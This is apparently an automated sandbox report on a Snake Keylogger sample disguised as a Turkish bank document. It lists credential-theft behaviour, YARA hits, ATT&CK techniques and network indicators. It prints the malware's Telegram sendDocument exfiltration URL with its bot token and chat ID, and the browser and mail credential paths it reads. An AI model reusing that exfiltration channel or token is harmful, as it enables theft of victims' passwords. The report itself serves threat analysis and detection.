Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Users\user\Desktop\.05.2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3748481710.000000000278C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\.05.2024.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\.05.2024.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3748481710.000000000278C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	21 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
.05.2024.exe	50%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
.05.2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	true		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	.05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.telegram.org/botx	.05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	.05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://api.telegram.orgx	.05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-420	.05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/q	.05.2024.exe, 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram	.05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://api.telegram.org	.05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	.05.2024.exe, 00000004.00000002.1306064134.0000000002471000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	.05.2024.exe, 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, .05.2024.exe, 0000000A.00000002.3748481710.000000000271F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520513
Start date and time:	2024-09-27 12:51:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	.05.2024.exe renamed because original name is a hash value
Original Sample Name:	internet mteri belirteci ve ifresi _ turkiye ziraat__11055699-1034 nolu TICARI 28.05.2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 67 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: .05.2024.exe

Simulations

Behavior and APIs

Time	Type	Description
06:52:05	API Interceptor	9192309x Sleep call for process: .05.2024.exe modified
06:52:08	API Interceptor	26x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	z64BLPL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse
188.114.96.3	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	hdcy.emcl00.com/qRCfs/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
193.122.130.0	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	REMITTANCE ADVICE.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	GEsD6lobvy.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.97.3
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	dekont.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	GEsD6lobvy.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	132.226.8.169
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	dekont.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
api.telegram.org	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	z64BLPL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://brawllstars.ru/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	https://telagremn.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://tg.hispa-net.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://www.traderstv.net/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://kapahereyupa.life/	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	ATT71725.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://metapolicyreview.com/	Get hash	malicious	Unknown	Browse	104.16.79.73
	Payment Notification.msg	Get hash	malicious	Unknown	Browse	104.21.68.220
